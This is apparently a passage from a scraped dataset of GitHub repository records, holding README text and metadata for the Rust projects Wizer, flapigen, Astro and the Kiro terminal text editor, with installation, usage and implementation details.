\n\n* [About](#about)\n* [Install](#install)\n* [Example Usage](#example-usage)\n* [Caveats](#caveats)\n* [Using Wizer as a Library](#using-wizer-as-a-library)\n* [How Does it Work?](#how-does-it-work)\n\n## About\n\nDon't wait for your Wasm module to initialize itself, pre-initialize it! Wizer\ninstantiates your WebAssembly module, executes its initialization function, and\nthen snapshots the initialized state out into a new WebAssembly module. Now you\ncan use this new, pre-initialized WebAssembly module to hit the ground running,\nwithout making your users wait for that first-time set up code to complete.\n\nThe improvements to start up latency you can expect will depend on how much\ninitialization work your WebAssembly module needs to do before it's ready. Some\ninitial benchmarking shows between 1.35 to 6.00 times faster instantiation and\ninitialization with Wizer, depending on the workload:\n\n| Program | Without Wizer | With Wizer | Speedup |\n|------------------------|--------------:|-----------:|-----------------:|\n| [`regex`][regex-bench] | 248.85 us | 183.99 us | **1.35x faster** |\n| [UAP][uap-bench] | 98.297 ms | 16.385 ms | **6.00x faster** |\n\n[regex-bench]: https://github.com/bytecodealliance/wizer/tree/main/benches/regex-bench\n[uap-bench]: https://github.com/bytecodealliance/wizer/tree/main/benches/uap-bench\n\nNot every program will see an improvement to instantiation and start up\nlatency. For example, Wizer will often increase the size of the Wasm module's\n`Data` section, which could negatively impact network transfer times on the\nWeb. However, the best way to find out if your Wasm module will see an\nimprovement is to try it out! Adding an initialization function isn't too hard.\n\nFinally, you can likely see further improvements by running\n[`wasm-opt`][binaryen] on the pre-initialized module. Beyond the usual benefits\nthat `wasm-opt` brings, the module likely has a bunch of initialization-only\ncode that is no longer needed now that the module is already initialized, and\nwhich `wasm-opt` can remove.\n\n[binaryen]: https://github.com/WebAssembly/binaryen\n\n## Install\n\nDownload the a pre-built release from the [releases](https://github.com/bytecodealliance/wizer/releases) page. Unarchive the binary and place it in your $PATH.\n\nAlternatively you can install via `cargo`:\n\n```shell-session\n$ cargo install wizer --all-features\n```\n\n## Example Usage\n\nFirst, make sure your Wasm module exports an initialization function named\n`wizer.initialize`. For example, in Rust you can export it like this:\n\n```rust\n#[export_name = \"wizer.initialize\"]\npub extern \"C\" fn init() {\n // Your initialization code goes here...\n}\n```\n\nFor a complete C++ example, see [this](https://github.com/bytecodealliance/wizer/tree/main/examples/cpp).\n\nThen, if your Wasm module is named `input.wasm`, run the `wizer` CLI:\n\n```shell-session\n$ wizer input.wasm -o initialized.wasm\n```\n\nNow you have a pre-initialized version of your Wasm module at\n`initialized.wasm`!\n\nMore details, flags, and options can be found via `--help`:\n\n```shell-session\n$ wizer --help\n```\n\n## Caveats\n\n* The initialization function may not call any imported functions. Doing so will\n trigger a trap and `wizer` will exit. You can, however, allow WASI calls via\n the `--allow-wasi` flag.\n\n* The Wasm module may not import globals, tables, or memories.\n\n* Reference types are not supported yet. It isn't 100% clear yet what the best\n approach to snapshotting `externref` tables is.\n\n## Using Wizer as a Library\n\nAdd a dependency in your `Cargo.toml`:\n\n```toml\n# Cargo.toml\n\n[dependencies]\nwizer = \"1\"\n```\n\nAnd then use the `wizer::Wizer` builder to configure and run Wizer:\n\n```rust\nuse wizer::Wizer;\n\nlet input_wasm = get_input_wasm_bytes();\n\nlet initialized_wasm_bytes = Wizer::new()\n .allow_wasi(true)?\n .run(&input_wasm)?;\n```\n\n## Using Wizer with a custom Linker\n\nIf you want your module to be able to import other modules during instantiation, you can\nuse the `.make_linker(...)` builder method to provide your own Linker, for example:\n\n```rust\nuse wizer::Wizer;\n\nlet input_wasm = get_input_wasm_bytes();\nlet initialized_wasm_bytes = Wizer::new()\n .make_linker(Some(Rc::new(|e: &wasmtime::Engine| {\n let mut linker = wasmtime::Linker::new(e);\n linker.func_wrap(\"foo\", \"bar\", |x: i32| x + 1)?;\n Ok(linker)\n })))\n .run(&input_wasm)?;\n```\n\nNote that `allow_wasi(true)` and a custom linker are currently mutually exclusive\n\n## How Does it Work?\n\nFirst we instantiate the input Wasm module with Wasmtime and run the\ninitialization function. Then we record the Wasm instance's state:\n\n* What are the values of its globals?\n* What regions of memory are non-zero?\n\nThen we rewrite the Wasm binary by intializing its globals directly to their\nrecorded state, and removing the module's old data segments and replacing them\nwith data segments for each of the non-zero regions of memory we recorded.\n\nWant some more details? Check out the talk [\"Hit the Ground Running: Wasm\nSnapshots for Fast Start\nUp\"](https://fitzgeraldnick.com/2021/05/10/wasm-summit-2021.html) from the 2021\nWebAssembly Summit.\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "Dushistov/flapigen-rs", "link": "https://github.com/Dushistov/flapigen-rs", "tags": ["java", "jni", "rust", "swig", "wrapper", "codegen", "c", "cpp"], "stars": 674, "description": "Tool for connecting programs or libraries written in Rust with other languages", "lang": "Rust", "repo_lang": "", "readme": "# flapigen [![Build Status](https://github.com/Dushistov/flapigen-rs/workflows/CI/badge.svg)](https://github.com/Dushistov/flapigen-rs/actions?query=workflow%3ACI+branch%3Amaster) [![License](https://img.shields.io/badge/license-BSD-green.svg)](https://github.com/Dushistov/flapigen-rs/blob/master/LICENSE) [![Rust Documentation](https://img.shields.io/badge/api-rustdoc-blue.svg)](https://docs.rs/flapigen)\n\nTool for connecting programs or libraries written in Rust with other languages.\nForeign language api generator - flapigen. Former name rust_swig was changed to not confuse\nwith [swig](https://github.com/swig/swig).\nCurrently implemented support for `C++` and `Java`, but you can write support\nfor any language of your choice. For an instruction how to integrate flapigen with your\nproject look [here](https://dushistov.github.io/flapigen-rs/getting-started.html).\n\nSuppose you have the following Rust code:\n\n```rust\nstruct Foo {\n data: i32\n}\n\nimpl Foo {\n fn new(val: i32) -> Foo {\n Foo{data: val}\n }\n\n fn f(&self, a: i32, b: i32) -> i32 {\n self.data + a + b\n }\n\n fn set_field(&mut self, v: i32) {\n self.data = v;\n }\n}\n\nfn f2(a: i32) -> i32 {\n a * 2\n}\n```\n\nand you want to write in Java something like this:\n\n```Java\nFoo foo = new Foo(5);\nint res = foo.f(1, 2);\nassert res == 8;\n```\nor in C++ something like this:\n\n```C++\nFoo foo(5);\nint res = foo.f(1, 2);\nassert(res == 8);\n```\n\nIn order to implement it flapigen suggests the following functionality,\nin Rust project you write (in Rust language):\n\n```rust\nforeign_class!(class Foo {\n self_type Foo;\n constructor Foo::new(_: i32) -> Foo;\n fn Foo::set_field(&mut self, _: i32);\n fn Foo::f(&self, _: i32, _: i32) -> i32;\n fn f2(_: i32) -> i32;\n});\n```\n\nand that's all, as a result flapigen generates JNI wrappers for Rust functions\nand Java code to call these JNI functions\nor generates C compatible wrappers in case of C++ and\nC++ code to call these C functions.\n\nIf you want the interface file (the file containing `foreign_class!` and so on)\nto be automatically generated for you, checkout [rifgen](https://crates.io/crates/rifgen).\n\n## Users Guide\n\n[\ud83d\udcda Read the `flapigen` users guide here! \ud83d\udcda](https://dushistov.github.io/flapigen-rs/)\n\n", "readme_type": "markdown", "hn_comments": "", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "astrolang/astro", "link": "https://github.com/astrolang/astro", "tags": ["astro", "programming-language", "wasm", "webassembly", "javascript", "language-features", "python", "numerical-computation"], "stars": 674, "description": "A fun safe language for rapid prototyping and high performance applications", "lang": "Rust", "repo_lang": "", "readme": "\n
\n \n \"Astro\n \n
\n\n

The Astro Programming Language

\n\n#### Work in Progress :construction:\nCurrent Version: 0.1.15a\n\n![astro screenshot](https://github.com/astrolang/astro/blob/develop/media/syntax_screenshot.png)\n\n### What is Astro?\nAstro is a fun programming language designed for safe _high-performance applications_. It is essentially a statically-typed systems language that\n- facilitates rapid prototyping,\n- features high-level abstractions with zero overhead,\n- ensures memory safety without a (tracing) Garbage Collector, and\n- supports data-race-free concurrency.\n\n### Why create yet another programming language?\nThe language creator had a set of requirements (listed above) not met by any language ([Rust](https://en.wikipedia.org/wiki/Rust_programming_language) comes close). Although, the project started as an educational effort, it later shaped into a language designed to meet those requirements.\n\nSIMD, threads and direct access to Web APIs are planned for WebAssembly. These and other proposals for GPU Compute will make the web a desirable HPC target in the near future. Astro is, for this reason, designed for high-performance apps that are expected to run on the server or in the browser.\n\nIn order to match up with the expressiveness and productivity of dynamic programming languages, Astro adds full type inference, structural typing, and some other high-level abstractions that reduce boilerplate code commonly associated with statically-typed languages. It feels like a scripting language for the most part.\n\n#### Python\n```python\ndef times(a, b):\n sum = a\n for i in range(b):\n sum += sum\n return sum\n```\n#### Astro\n```kotlin\nfun times(a, b) {\n var sum = a\n for i in range(b) {\n sum += sum\n }\n return sum\n}\n```\n\nAstro is supposed to be high-level enough to write python-like scripts but also low-level enough to write an operating system kernel. Therefore, it doesn't have a traditional [garbage collector](https://en.m.wikipedia.org/wiki/Garbage_collection_(computer_science)) instead it relies on lifetime analysis at compile-time that free memory once they are no longer referenced.\n\n### How close is Astro to being ready for use?\nNot close. Astro is at its infancy, there are several tasks to complete before it becomes usable.\n\nFor now, Astro can compile its source code to ast format. It is not ready for even the simplest application. It is also currently implemented Rust (it was being implemented in Javascript and C++), however, the plan is to bootstrap the compiler (implement it in Astro) once it is sufficiently well-featured.\n\n### Where can I read about the language?\nThere is no thorough documentation for the language yet since the main implementation is still in active development, however, you can find an up-to-date summary of language features [here](doc/summary.astro).\n\n### How do I install it?\nN/A\n\n### Want to contribute to the project?\nPlease read the [code of conduct](CODE_OF_CONDUCT.md) and contribution [guidelines](CONTRIBUTING.md). We welcome your ideas and contributions.\n\n### Do you have an unanswered question?\nPlease [open an issue](https://github.com/appcypher/astro/issues/new) and ask questions, offer to help, point out bugs or suggest features.\n\n### Attributions\nAstro logo made by [Freepik](https://www.freepik.com/)\n\n### License\n[Apache 2.0](LICENSE)\n", "readme_type": "markdown", "hn_comments": "Hey HN! I am launching a new product today that adds a bunch of features to your SaaS products to speed up your growth.Add Astrola to your subdomain and gain instant access to the following:Knowledge Base: Document in multiple languages. \n Feedback: Gather feedback, vote and comment. \n Roadmaps: Plan your upcoming features. \n Changelogs: Share what's new with your product. \n Blogging: Organic growth with SEO ready blogs. \n Newsletters: Send subscribers your latest posts. \n Customize: Match your brand with design options.I've been working on this project nights and weekends for about a year. It's been a fun mix of a lot of things -- hardware, software, CAD, web apps, device drivers.It's still rather primitive, but it's reached a point where I believe it could be useful to other astronomers.I'd appreciate feedback from anyone about the web site, video walkthrough, and product. If you are into astronomy or astrophotography, I'd especially appreciate any feedback you have about the product itself, and what you'd find useful.Thanks in advance for checking it out.", "gh_updated_time": "", "gh_accessed_time": "", "hn_accessed_time": ""}, {"name": "rhysd/kiro-editor", "link": "https://github.com/rhysd/kiro-editor", "tags": ["terminal", "text-editor", "utf-8", "rust"], "stars": 674, "description": "A terminal UTF-8 text editor written in Rust \ud83d\udcdd\ud83e\udd80", "lang": "Rust", "repo_lang": "", "readme": "Kiro\n====\n[![crates.io][crates-io-badge]][crates-io]\n[![Build Status][build-badge]][ci]\n\n[Kiro][] is a tiny UTF-8 text editor on terminal written in Rust. Kiro was started as a Rust port of\nawesome minimal text editor [kilo][] and has grown with various extensions & improvements.\n\n\"main\n\nIt provides basic features as a minimal text editor:\n\n- Open/Save text files\n- Create new text files and empty text buffer on memory\n- Edit a text (put/delete characters, insert/delete lines, ...)\n- Simple syntax highlighting\n- Simple incremental text search\n\nAnd Kiro extends [kilo][] to improve editing (please see 'Extended Features' section and 'Implementation'\nsection below for more details):\n\n- Support editing UTF-8 characters like '\ud83d\udc36' (kilo only supports ASCII characters)\n- Undo/Redo\n- More useful shortcuts (Alt modifier is supported)\n- 24bit colors (true colors) and 256 colors support using [gruvbox][] retro color palette with 16\n colors fallback\n- More efficient screen rendering and highlighting (kilo renders entire screen each time)\n- Open multiple files (switch buffers by Ctrl-X/Alt-X)\n- Resizing terminal window supported. Screen size is responsible\n- Highlight more languages (Rust, Go, JavaScript, C++) and items (statements, types, number literals, ...)\n- Automatically closes the message bar at bottom of line\n- Modular implementation for each logics such as parsing key inputs, rendering screen, calculating\n highlight, modifying text buffer (kilo implements everything in one `kilo.c` with several global\n variables)\n- Incremental text search is fixed and improved (kiro only highlights current match and only hits\n once per line).\n\n[Kiro][] aims to support kinds of xterm terminals on Unix-like systems. For example Terminal.app,\niTerm2.app, Gnome-Terminal, (hopefully) Windows Terminal on WSL.\n\nI learned various things by making this project following ['Build Your Own Text Editor' guide][byote].\nPlease read 'Implementation' section below to find some interesting topics.\n\n\n\n## Installation\n\nPlease install [`kiro-editor`][crates-io] package by building from sources using [cargo][].\n\n```\n$ cargo install kiro-editor\n```\n\nNote: Please use a Rust stable toolchain as new as possible.\n\nFor NetBSD, `kiro-editor` package is available.\n\nhttps://pkgsrc.se/editors/kiro-editor\n\n\n\n## Usage\n\n### CLI\n\nInstalling [`kiro-editor`][crates-io] package introduces `kiro` command in your system.\n\n```sh\n$ kiro # Start with an empty text buffer\n$ kiro file1 file2... # Open files to edit\n```\n\nPlease see `kiro --help` for command usage.\n\n\n### Edit Text\n\nKiro is a mode-less text editor. Like other famous mode-less text editors such as Nano, Emacs,\nGedit or NotePad.exe, you can edit text in terminal window using a keyboard.\n\nAnd several keys with Ctrl or Alt modifiers are mapped to various features. You don't need to\nremember all mappings. Please type `Ctrl-?` to know all mappings in editor.\n\n- **Operations**\n\n| Mapping | Description |\n|----------|-------------------------------------------------------------------------------------|\n| `Ctrl-?` | Show all key mappings in editor screen. |\n| `Ctrl-Q` | Quit Kiro. If current text is not saved yet, you need to input `Ctrl-Q` twice. |\n| `Ctrl-S` | Save current buffer to file. Prompt shows up to enter file name for unnamed buffer. |\n| `Ctrl-G` | Incremental text search. |\n| `Ctrl-O` | Open file or empty buffer. |\n| `Ctrl-X` | Switch to next buffer. |\n| `Alt-X` | Switch to previous buffer. |\n| `Ctrl-L` | Refresh screen. |\n\n- **Moving cursor**\n\n| Mapping | Description |\n|-------------------------------------|------------------------------------|\n| `Ctrl-P` or `\u2191` | Move cursor up. |\n| `Ctrl-N` or `\u2193` | Move cursor down. |\n| `Ctrl-F` or `\u2192` | Move cursor right. |\n| `Ctrl-B` or `\u2190` | Move cursor left. |\n| `Ctrl-A` or `Alt-\u2190` or `HOME` | Move cursor to head of line. |\n| `Ctrl-E` or `Alt-\u2192` or `END` | Move cursor to end of line. |\n| `Ctrl-[` or `Ctrl-V` or `PAGE DOWN` | Next page. |\n| `Ctrl-]` or `Alt-V` or `PAGE UP` | Previous page. |\n| `Alt-F` or `Ctrl-\u2192` | Move cursor to next word. |\n| `Alt-B` or `Ctrl-\u2190` | Move cursor to previous word. |\n| `Alt-N` or `Ctrl-\u2193` | Move cursor to next paragraph. |\n| `Alt-P` or `Ctrl-\u2191` | Move cursor to previous paragraph. |\n| `Alt-<` | Move cursor to top of file. |\n| `Alt->` | Move cursor to bottom of file. |\n\n- **Edit text**\n\n| Mapping | Description |\n|-------------------------|---------------------------|\n| `Ctrl-H` or `BACKSPACE` | Delete character |\n| `Ctrl-D` or `DELETE` | Delete next character |\n| `Ctrl-W` | Delete a word |\n| `Ctrl-J` | Delete until head of line |\n| `Ctrl-K` | Delete until end of line |\n| `Ctrl-M` | Insert new line |\n| `Ctrl-U` | Undo last change |\n| `Ctrl-R` | Redo last undo change |\n\nHere is some screenshots for basic features.\n\n- **Create a new file**\n\n\"screenshot\n\n- **Incremental text search**\n\n\"screenshot\n\n\n### Extended Features\n\n#### Support Editing UTF-8 Text\n\nKiro is a UTF-8 text editor. So you can open/create/insert/delete/search UTF-8 text including double width\ncharacters support.\n\n![UTF-8 supports](https://github.com/rhysd/ss/blob/master/kiro-editor/multibyte_chars.gif?raw=true)\n\nNote that emojis using `U+200D` (zero width joiner) like '\ud83d\udc6a' are not supported yet.\n\nPlease read 'Support Editing UTF-8 Text' subsection for implementation details.\n\n#### 24-bit colors (true colors) and 256 colors support\n\nKiro utilizes colors as much as possible looking your terminal supports. It outputs 24-bit colors\nwith [gruvbox][] color scheme falling back to 256 colors or eventually to 16 colors.\n\n- **24-bit colors**\n\n\"24-bit\n\n- **256 colors**\n\n\"256\n\n- **16 colors**\n\n\"16\n\n#### Handle window resize\n\nTerminal notifies a window resize event via SIGWINCH signal. Kiro catches the signal and properly redraws\nits screen with new window size.\n\n![resize window](https://github.com/rhysd/ss/blob/master/kiro-editor/resize.gif?raw=true)\n\n### Undo/Redo\n\nKiro supports undo/redo editing (`Ctrl-U` for undo, `Ctrl-R` for redo). Max number of history entries\nis 1000. After exceeding it, oldest entry is removed on adding new change to text.\n\n\"undo/redo\n\nPlease read 'Text editing as sequence of diffs' subsection.\n\n\n\n## Implementation\n\nThis project was a study to understand how a text editor can be implemented interacting with a\nterminal application. I learned many things related to interactions between terminal and application\nand several specs of terminal escape sequences such as VT100 or xterm.\n\nI started from porting an awesome minimal text editor [kilo][] following a guide\n['Built Your Own Text Editor'][byote]. And then I added several improvements to my implementation.\n\nHere I write topics which were particularly interesting for me.\n\n\n### Efficient Rendering and Highlighting\n\n[kilo][] updates rendering and highlighting each time you input a key. This implementation is great\nto make implementation simple and it works fine.\n\nHowever, it is insufficient and I felt some performance issue on editing larger (10000~ lines) C file.\n\nSo [Kiro][] improves the implementation to render the screen and to update highlighting only when\nnecessary.\n\n[Kiro][] has a variable `dirty_start` in `Screen` struct of [screen.rs](./src/screen.rs). It manages\nfrom which line rendering should be started.\n\nFor example, let's say we have C code bellow:\n\n```c\nint main() {\n printf(\"hello\\n\");\n}\n```\n\nAnd put `!` like `printf(\"hello!\\n\");`.\n\nIn the case, first line does not change. So we don't need to update the line. However, Kiro renders\nthe `}` line also even if the line does not change. This is because modifying text may cause highlight\nof lines after the line. For example, when deleting `\"` after `\\n`, string literal is not terminated so\nnext line continues string literal highlighting.\n\nHighlighting has the similar characteristic. Though [kilo][] calculates highlighting of entire text buffer\neach time you input key, actually the lines after bottom of screen are not rendered.\nFor current syntax highlighting, changes to former lines may affect later lines highlighting\n(e.g. block comments `/* */`), changes to later lines don't affect former lines highlighting. So Kiro\nstops calculating highlights at the line of bottom of screen.\n\n\n### UTF-8 Support\n\n[kilo][] only supports ASCII text. Width of ASCII character is fixed to 1 byte. This assumption reduces\ncomplexity of implementation of kilo greatly because:\n\n- every character can be represented as `char` (almost the same as `u8` in Rust)\n- any character in ASCII text can be accessed via byte index in O(1)\n- length of text is the same as number of bytes of the text\n\nSo kilo can contain text buffer as simple `char *` and accesses characters in it via byte index.\nIn addition, display width of all printable ASCII characters is fixed except for `0x09` tab character.\n\nBut actually there are more characters in the world defined as Unicode characters. Since I'm Japanese,\nthe characters such as Kanji or Hiragana I'm daily using are not ASCII. And the most major text encoding\nis UTF-8. So I determined to extend Kiro editor to support UTF-8.\n\nIn UTF-8, byte length of character is variable. Any character takes 1~4 bytes (or more in special case).\nThe important point here is that accessing to character in UTF-8 text is not O(1). To access to N-th\ncharacter or to know length of text, it requires to check characters from head of the text.\n\nAccessing to character in text and getting text length happen frequently while updating text buffer\nand highlights. So checking them in O(N) for each time is not efficient. To solve this problem, Kiro\ncontains byte indices of each characters in line text as `Vec`. These indices are only existing\nwhen at least one character in line text is non-ASCII character.\n\n![UTF-8 support diagram](./assets/utf-8-support-diagram.png)\n\nIn `Row` struct which represents one text line, `indices` field (`Vec`) is dedicated to store\nbyte indices of each character.\n\nIn the first case `\"Rust is nice\"`, all characters are ASCII so byte index can be used to access to\ncharacters in the text. In the case, `indices` field is an empty (and capacity is set to zero). A `Vec`\ninstance with zero capacity is guaranteed not to allocate heap memory. So the memory overhead here is\n24 bytes of `Vec` instance itself (pointer, capacity as `usize` and length as `usize`) only.\n\nIn the second case `\"Rust\ud83e\udd80\u826f\u3044\"`, there are some non-ASCII characters so `self.indices` caches byte\nindices of each characters. Thanks to this cache, each character can be accessed in O(1) and its text\nlength can be obtained in O(1) as `self.indices.len()`. `Row` also contains a rendered text and updates\nit when internal text buffer is updated by `TextBuffer`. So `self.indices` cache is also updated at\nthe same timing efficiently.\n\nThough keeping byte indices in `Vec` is quite memory inefficient, the indices are only required\nwhen the line text contains non-ASCII characters. In terms of programming code editor, it is relatively\nrare case, I believe.\n\n\n### Text Editing as Sequence of Diffs\n\nIn Kiro editor, every text edit is represented as diff of text. So text editing means applying diffs to\ncurrent text buffer. Undo is represented as 'unapplying' diffs. Redo is represented as applying diffs\nagain.\n\nOne undo is represented as multiple diffs, not one diff. This is because users usually don't want to\nundo per inserting one character. So diffs each character inserts a character is put together as one\nundo.\n\n![UTF-8 support diagram](./assets/undo-redo-support-diagram.png)\n\nAt first a user inputs \"abc\" to text. The input is represented as 3 diffs of each\ncharacters and they consist of one undo unit. So inserting \"abc\" is reverted at once on undo though\nit is represented as multiple diffs.\nThen a user backs cursor by one character and delete characters \"ab\" until head of line. It is represented\nas one diff.\nFinally a user adds a new line by ENTER key. Inserting line is represented as two diffs. At first, editor\ntruncates a text after cursor (\"c\") and then it inserts new line \"c\" to next line to the cursor. These\ntwo diffs consist of one undo unit.\n\nBy managing history of text editing with undo units, every text edit can be represented as sequence of\ndiffs. Redo applies diffs in one undo unit to current text buffer. And undo unapplies diffs in one undo\nunit to current text buffer.\n\nNormal input is also treated as redo internally so that editor doesn't need to handle normal input with\nseparate implementation.\n\n### Porting C editor to Rust\n\n#### Separate one C source into several Rust modules\n\nTo simplify and minimize implementation, [kilo][] uses some global variables and local `static`\nvariables. Editor's state is stored in a global variable `E` and it is referred everywhere.\n\nWhile porting the code to Rust, I split `kilo.c` into some Rust modules for each logics. I removed\nthe global variables and local static variables by moving them to each logic's structs.\n\n- [`editor.rs`](src/editor.rs): Exports `Editor` struct, which manages an editor lifecycle; Runs loop\n which gets key input, updates a text buffer and highlight then renders screen.\n- [`text_buffer.rs`](src/text_buffer.rs): Exports `TextBuffer` struct, which manages an editing text\n buffer as `Vec`. It also contains metadata such as file name and file type of the buffer.\n- [`edit_diff.rs`](src/edit_diff.rs): Editing text is defined as applying sequence of diffs to text.\n This module exports an enum `EditDiff` which represents the diff and logic to apply it to text.\n- [`row.rs`](src/row.rs): Exports `Row` struct which represents one line of text buffer and contains\n actual text and rendered text. Since Kiro is dedicated for UTF-8 text editing, internal text buffer\n is also kept as UTF-8 string. When the internal text buffer is updated by `Editor`, it automatically\n updates rendered text also. It may also contain character indices for UTF-8 non-ASCII characters\n (Please see below 'UTF-8 Support' section).\n- [`history.rs`](src/history.rs): It exports struct `History` which manages the edit history. The history\n is represented as sequence of edit diffs. It manages the state of undo/redo and how many changes should\n happen on one undo/redo operation.\n- [`input.rs`](src/input.rs): Exports `StdinRawMode` struct and `InputSequences` iterator.\n `StdinRawMode` setups STDIN as raw mode (disable various terminal features such as echo back).\n `InputSequences` reads user's key input as byte sequence with timeout and parses it as stream of\n key sequence. VT100 and xterm escape sequences like `\\x1b[D` for `\u2190` key are parsed here.\n- [`highlight.rs`](src/highlight.rs): Exports `Highlighting` struct, which contains highlight information\n of each character in text buffer. It also manages highlighting in an editor lifecycle. It calculates\n highlights of characters which is rendered and updates its information.\n- [`screen.rs`](src/screen.rs): Exports `Screen` struct, which represents screen rendering. It renders\n each `Row` with highlight colors by outputting characters and escape sequences to STDOUT. As described\n in previous section, it manages efficient rendering. It also manages and renders status bar and message\n bar located at bottom of screen.\n- [`status_bar.rs`](src/status_bar.rs): Exports `StatusBar` struct which manages fields displayed in the\n status bar. It has flag `redraw` to determine if it should be re-rendered.\n- [`prompt.rs`](src/prompt.rs): Exports structs related to user prompt using message bar. This module\n has logic to run user prompt and text search. Callbacks while prompt is represented as a `PromptAction`\n trait.\n- [`term_color.rs`](src/term_color.rs): Exports small `TermColor` enum and `Color` enum, which represents\n terminal colors. This module also has logic to detect 24-bit colors and 256 colors support of terminal.\n- [`language.rs`](src/language.rs): Exports small `Language` enum, which represents file types like\n C, Rust, Go, JavaScript, C++. It contains logic to detect a file type from file name.\n- [`signal.rs`](src/signal.rs): Exports `SigwinchWatcher` struct, which receives SIGWINCH signal and\n notifies it to `Screen`. The signal is sent when terminal window size changed. `Screen` requires\n the notification for resizing the screen.\n- [`error.rs`](src/error.rs): Exports `Error` enum and `Result` type to handle all kinds of error\n which may occur in Kiro editor.\n\n#### Error handling and resource clean up\n\n[kilo][] outputs message by `perror()` and immediately exits on error. It also cleans up STDIN\nconfiguration with `atexit` hook.\n\nKiro is implemented in Rust. So it utilizes Rust idioms to handle errors with `io::Result` and `?`\noperator. It reduces codes for error handling so that I could focus on implementing editor logics.\n\nFor resource clean up, Rust's `Drop` crate works greatly in `input.rs`.\n\n```rust\nstruct StdinRawMode {\n stdin: io::Stdin,\n // ...\n}\n\nimpl StdinRawMode {\n fn new() -> io::Result {\n // Setup terminal raw mode of stdin here\n // ...\n }\n}\n\nimpl Drop for StdinRawMode {\n fn drop(&mut self) {\n // Restore original terminal mode of stdin here\n }\n}\n\nimpl Deref for StdinRawMode {\n type Target = io::Stdin;\n fn deref(&self) -> &Self::Target {\n &self.stdin\n }\n}\n\nimpl DerefMut for StdinRawMode {\n fn deref_mut(&mut self) -> &mut Self::Target {\n &mut self.stdin\n }\n}\n```\n\nThe `drop()` method is called when `StdinRawMode` instance dies. So user doesn't need to remember\nthe clean up. And `StdinRawMode` also implements `Deref` and `DerefMut` so that it behaves almost\nas if it were `Stdin`. By wrapping `io::Stdin` like this, I could add the ability to enter/leave\nterminal raw mode to `io::Stdin`.\n\n#### Abstract input and output of editor\n\n```rust\npub struct Editor\nwhere\n I: Iterator>,\n W: Write,\n{\n // ...\n}\n\nimpl Editor\nwhere\n I: Iterator>,\n W: Write,\n{\n // Initialize Editor struct with given input and output\n pub fn new(input: I, output: W) -> io::Result> {\n // ...\n }\n}\n```\n\nThe input of terminal text editor is a stream of input sequences from terminal which include\nuser's key input and control sequences. The input is represented with `Iterator` trait of input sequence.\nHere `InputSeq` represents one key input or one control sequence.\n\nThe output of terminal text editor is also stream of sequences to terminal which include output\nstrings and control sequences. It's done by simply writing to stdout. So it is represented with\n`Write` trait.\n\nThe benefit of these abstractions are testability of each modules. By creating a dummy struct which\nimplements `Iterator>`, the input can be easily replaced with dummy input.\nSince [kilo][] does not have tests, these abstractions are not necessary for it.\n\n```rust\nstruct DummyInput(Vec);\n\nimpl Iterator for DummyInput {\n type Item = io::Result;\n\n fn next(&mut self) -> Option {\n if self.0.is_empty() {\n None\n } else {\n Some(Ok(self.0.remove(0)))\n }\n }\n}\n\n// Dummy Ctrl-Q input to editor\nlet dummy_input = DummyInput(vec![ InputSeq::ctrl(b'q') ]);\n```\n\nAnd by implementing a small struct which simply discards output, we can ignore the output. It does\nnot need to draw screen in terminal window. And it does not rely on global state (terminal raw mode)\nso that tests can run in parallel. As the result tests can run faster and terminal window doesn't mess up.\n\n```rust\nstruct Discard;\n\nimpl Write for Discard {\n fn write(&mut self, buf: &[u8]) -> io::Result {\n Ok(buf.len())\n }\n\n fn flush(&mut self) -> io::Result<()> {\n Ok(())\n }\n}\n```\n\nBy using these mocks the input and output of editor can be tested easily as follows:\n\n```rust\n#[test]\nfn test_editor() {\n let mut editor = Editor::new(dummy_input, Discard).unwrap();\n editor.edit().unwrap();\n for line in editor.lines() {\n // Check lines of the current text buffer\n }\n}\n```\n\n#### Dependant Crates\n\nThis project depends on some small crates. I selected them carefully not to prevent learning how a\ntext editor on terminal works.\n\n- [termios][]: Safe binding to `termios` interface provided by OS.\n- [term_size][]: Safe binding to getting terminal window size with ioctl(2).\n- [unicode-width][]: Small library to calculate Unicode character's display width.\n- [term][]: Library for terminfo and terminal colors. This project uses this library only to parse\n terminfo for 256 colors support.\n- [signal-hook][]: Small wrapper for signal handler to catch SIGWINCH for resize support.\n- [getopts][]: Fairly small library to parse command line arguments. Kiro only has quite simple CLI\n options so [clap][] is too heavy.\n\n\n### TODO\n\n- Unit tests are not sufficient. More tests should be added\n- Improve scrolling performance (Is terminal scrolling available?)\n- Minimal documentation\n- Text selection and copy from or paste to system clipboard\n- Keeping all highlights (`Vec`) is not memory efficient. Keep bits only for current\n screen (`rowoff..rowoff+num_rows`)\n- Use parser library [combine](https://github.com/Marwes/combine) or [nom](https://github.com/Geal/nom)\n to calculate highlighting. Need some investigation since highlight parser must stop calculating when\n current line exceeds the bottom line of screen. Also [syntect](https://github.com/trishume/syntect) is\n interesting.\n\n\n### Future Works\n\n- Use incremental parsing for accurate syntax highlighting\n- Support more systems and terminals\n- Look editor configuration file such as [EditorConfig](https://editorconfig.org/)\n or [`.vscode` VS Code workspace settings](https://code.visualstudio.com/docs/getstarted/settings)\n- Support emojis using `U+200D`\n- WebAssembly support\n- Mouse support\n- Completion, go to definition and look up using language servers\n\n\n### Development\n\nBenchmarks are done by [cargo bench][cargo-bench] and fuzzing is done by [cargo fuzz][cargo-fuzz] and [libFuzzer][libfuzzer].\n\n```sh\n# Create release build\ncargo build --release\n\n# Run tests\ncargo test\n\n# Run benchmarks\ncargo +nightly bench -- --logfile out.txt && cat out.txt\n\n# Run fuzzing\ncargo +nightly fuzz run input_text\n```\n\n\n\n## License\n\nThis project is distributed under [the MIT License](./LICENSE.txt).\n\n\n[Kiro]: https://github.com/rhysd/kiro-editor\n[kilo]: https://github.com/antirez/kilo\n[byote]: https://viewsourcecode.org/snaptoken/kilo/\n[gruvbox]: https://github.com/morhetz/gruvbox\n[cargo]: https://github.com/rust-lang/cargo\n[build-badge]: https://github.com/rhysd/kiro-editor/workflows/CI/badge.svg\n[ci]: https://github.com/rhysd/kiro-editor/actions\n[crates-io]: https://crates.io/crates/kiro-editor\n[crates-io-badge]: https://img.shields.io/crates/v/kiro-editor.svg\n[termios]: https://crates.io/crates/termios\n[term_size]: https://crates.io/crates/term_size\n[unicode-width]: https://crates.io/crates/unicode-width\n[term]: https://crates.io/crates/term\n[signal-hook]: https://crates.io/crates/signal-hook\n[getopts]: https://crates.io/crates/getopts\n[clap]: https://crates.io/crates/clap\n[cargo-bench]: 